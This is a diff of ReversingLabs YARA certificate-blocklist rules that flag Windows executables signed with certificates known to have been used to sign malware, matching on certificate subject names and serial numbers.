+rule REVERSINGLABS_Cert_Blocklist_F62C9C4Efc81Caf0D5A2608009D48018 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ff8149b-4a90-5593-b12a-d815b04fce7e"
+		id = "176434ae-7162-5b35-91f7-888536250884"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9822-L9840"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "348df24620bfe6322c410cb593f5caad67492b0b5af234ee89b0411beb4b48f9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2730-L2748"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "08fcff795297c0608b1a1d71465279cbf76d4dff06de2a2262a58debbb2f9e0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12703,21 +37368,21 @@ rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Argus Security Maintenance Systems Inc." and ( pe.signatures [ i ] . serial == "00:be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" or pe.signatures [ i ] . serial == "be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" ) and 1634235015 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x94\\x90\\xE5\\xB1\\xB1\\xE4\\xB8\\x87\\xE4\\xB8\\x9C\\xE6\\xB6\\xA6\\xE6\\x92\\xAD\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" or pe.signatures [ i ] . serial == "f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" ) and 1292889599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cc8D902Da36587C9B2113Cd76C3C3F8D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d52066d5-9bc1-5f72-8e97-7efda88c14b2"
+		id = "f9e542aa-eaa5-50a5-95dc-fb55f8575c89"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9842-L9858"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "70d57f2c24d4ae6f17339bfb998589a3b10f5dd4b19ac8a5bc99e082145c4ed0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2750-L2768"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "25e524d23ccc1c06f602a086369ffd44b8c97b76c29f068764081339556b3465"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12727,21 +37392,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CB CAM SP Z O O" and pe.signatures [ i ] . serial == "0f:20:a5:15:5e:53:ce:20:bb:64:4f:64:6e:d6:a2:fd" and 1635196200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE9\\x87\\x91\\xE4\\xBF\\x8A\\xE5\\x9D\\xA4\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" or pe.signatures [ i ] . serial == "cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" ) and 1292544000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_328Bdcc0F679C4649147Fbb3Eb0E9Bc6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8e059a2a-c436-5247-b395-a2f594c1c9a9"
+		id = "8e2c2204-8905-5e05-9ec8-e1577ae4c2cb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9860-L9878"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a18d1c1e5e22c1aa041a4b2d23d2aefcbedbd3517a079d578e1a143ecadb4533"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2770-L2786"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6d9e1f25ca252ca9dda7714c52a2e57fd3b5dca08cd2a45c9dec18a31d3bb342"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12751,21 +37416,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) and 1635153791 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nooly Systems LTD" and pe.signatures [ i ] . serial == "32:8b:dc:c0:f6:79:c4:64:91:47:fb:b3:eb:0e:9b:c6" and 1204847999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5F78149Eb4F75Eb17404A8143Aaeaed7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63938a97-2cb3-52b0-9717-c8949e3fae46"
+		id = "4c9d3bba-4e7f-5bf5-ab90-f2b900ec0b2a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9880-L9898"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "69b9012fc4ab9636d159de49ff452f054030c1157cf70a95512b2a0748dad7c0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2788-L2804"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0c7c9e8d2a9304e0407b8a1a29977312a9ba766a4052c6b874855fa187c85585"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12775,21 +37440,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fjordland Bike Wear ApS" and ( pe.signatures [ i ] . serial == "00:ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" or pe.signatures [ i ] . serial == "ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" ) and 1636145940 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\x9F\\x9F\\xE8\\x81\\x94\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "5f:78:14:9e:b4:f7:5e:b1:74:04:a8:14:3a:ae:ae:d7" and 1303116124 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_629D120Dd84F9C1688D4Da40366Fab7A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50cc539a-1f00-566d-a83f-b4d8459506d8"
+		id = "7e6249ba-3a4f-5096-be32-779e73c88221"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9900-L9918"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d37e1d94048339a86b8fa173d3ab753fc5e79329b73df9fda5815cd622c57745"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2806-L2822"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "187f6ef0de869500526d1b0d5c6f6762b0a939e06781e633a602834687c64023"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12799,21 +37464,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL-FORCE ApS" and ( pe.signatures [ i ] . serial == "00:cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" or pe.signatures [ i ] . serial == "cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" ) and 1636111842 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Delta Controls" and pe.signatures [ i ] . serial == "62:9d:12:0d:d8:4f:9c:16:88:d4:da:40:36:6f:ab:7a" and 1306799999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_039E5D0E3297F574Db99E1D9503853D9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a72a0001-a272-506d-b610-c028ed8ac6da"
+		id = "969ffa17-de06-58d5-a74e-c115b49a9a6c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9920-L9938"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "33a05d46b40ffdf49bfa5facca41ebdf6bedcabc1cb1f5b9bf2d043ad1c869b0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2824-L2840"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2f150f60b7dce583fc68705f0b29a7c8684f1b69020275b2ec1ac6beeaa63952"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12823,21 +37488,21 @@ rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT, LLC" and ( pe.signatures [ i ] . serial == "00:d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" or pe.signatures [ i ] . serial == "d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" ) and 1636456620 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cigam Software Corporativo LTDA" and pe.signatures [ i ] . serial == "03:9e:5d:0e:32:97:f5:74:db:99:e1:d9:50:38:53:d9" and 1378079999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bc32Bbe5Bbb4F06F490C50651Cd5Da50 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e5643d08-5957-58b0-8b46-d5e339dfba9c"
+		id = "eb6ccc6d-2a66-5113-8b78-c32012431123"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9940-L9956"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "21c8e8f10d1e4b9eb917c86ac868de2afcd5776a9c1d59149df1d07d8c3e14b9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2842-L2860"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "104be481b7d4b1cb3c43c72314afc3641983838b5177c34a88d6da0d0e7b89c9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12847,21 +37512,21 @@ rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE CLEAN LTD" and pe.signatures [ i ] . serial == "30:54:f9:40:c9:31:ba:d7:b2:38:a2:43:76:c6:a5:cc" and 1637030220 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Remedica Medical Education and Publishing Ltd" and ( pe.signatures [ i ] . serial == "00:bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" or pe.signatures [ i ] . serial == "bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" ) and 1387151999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E1656Dfcaacfed7C2D2564355698Aa3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ffb592c-eec5-51b1-9840-b6b72269fc31"
+		id = "57b75eaa-2cb2-5713-8eb3-065f90a1fdd5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9958-L9976"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f307a0b598f0876c003aa43db50e024698b6f93931e626c085f98553c14ec2ae"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2862-L2878"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ba7cca8d71f571644cabd3d491cddefffd05ca7a838f262a343a01e4a09bb72a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12871,21 +37536,21 @@ rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXPRESS BOOKS LTD" and ( pe.signatures [ i ] . serial == "00:a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" or pe.signatures [ i ] . serial == "a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" ) and 1636971821 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "John W.Richard" and pe.signatures [ i ] . serial == "3e:16:56:df:ca:ac:fe:d7:c2:d2:56:43:55:69:8a:a3" and 1385251199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Bf1D68E926E2Dd8966008C44F95Ea1C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f4a26f2-689a-57bd-8028-d3554e339e60"
+		id = "c82170a4-911c-5206-bae8-6503a5449df9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9978-L9994"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2377eeb5316d25752443735e78d0ad7de398a2677f5a0fd45fd6e6c87720d49b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2880-L2896"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "44b5aae8380e3590ebb6e2365e89b3827432e8330e5290dc8f8603a00bcf62f6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12895,21 +37560,21 @@ rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" and 1637141034 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Technical and Commercial Consulting Pvt. Ltd." and pe.signatures [ i ] . serial == "4b:f1:d6:8e:92:6e:2d:d8:96:60:08:c4:4f:95:ea:1c" and 1322092799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_149C12083C145E28155510Cfc19Db0Fe : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b557864d-c573-5789-9959-8df3036d5ac5"
+		id = "8d9b0b1c-df7c-560a-8d51-bc8738952457"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9996-L10012"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bc3ef217455b74900cae114d25b02325d2bef25c11873342df1dd2369cbce76a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2898-L2914"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f616fc470e223d65ac4c984394a38d566265ab37829ff566012de0a1527396c2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12919,21 +37584,21 @@ rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" and 1638832273 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3rd Eye Solutions Ltd" and pe.signatures [ i ] . serial == "14:9c:12:08:3c:14:5e:28:15:55:10:cf:c1:9d:b0:fe" and 1209340799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_77E0117E8B2B8Faa84Bed961019D5Ef8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "620c04df-e613-5319-aa00-646c7e0c8031"
+		id = "2733cc5b-bc1f-5ba9-a2f4-50f472fc288e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10014-L10030"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24bee3563e0867ef6702e7f57bbce7075f766410650ae5ce1e2e8c7b14a3eaca"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2916-L2932"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bea94b9da8c176f22a66fe7a4545dcc3a38f727a75a0bc7920d9aece8e24b9b7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12943,21 +37608,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" and 1638390070 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Reiner Wodey Informationssysteme" and pe.signatures [ i ] . serial == "77:e0:11:7e:8b:2b:8f:aa:84:be:d9:61:01:9d:5e:f8" and 1383695999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F3Feb4Baf377Aea90A463C5Dee63884 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6678bd73-bf4d-5576-8bf2-b721ee288da7"
+		id = "8de9bcf3-d705-590f-8898-52218f937571"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10032-L10048"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "27610bb3bf069991803611474abf44a3bf82fc9283d0412a1c24ae46a3f5352e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2934-L2950"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "56c37e758db33aa40e9a2c1c5a4eb14c2c370f614e838d86bf20c64f79e2a746"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12967,21 +37632,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" and 1638372946 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F3D LIMITED" and pe.signatures [ i ] . serial == "4f:3f:eb:4b:af:37:7a:ea:90:a4:63:c5:de:e6:38:84" and 1526601599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3D2580E89526F7852B570654Efd9A8Bf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing LockerGoga ransomware."
 		author = "ReversingLabs"
-		id = "37e60515-0395-51a5-8bfa-35e3e336d60c"
+		id = "0514759c-2d10-5b29-aa2f-d16eb45b2816"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10050-L10068"
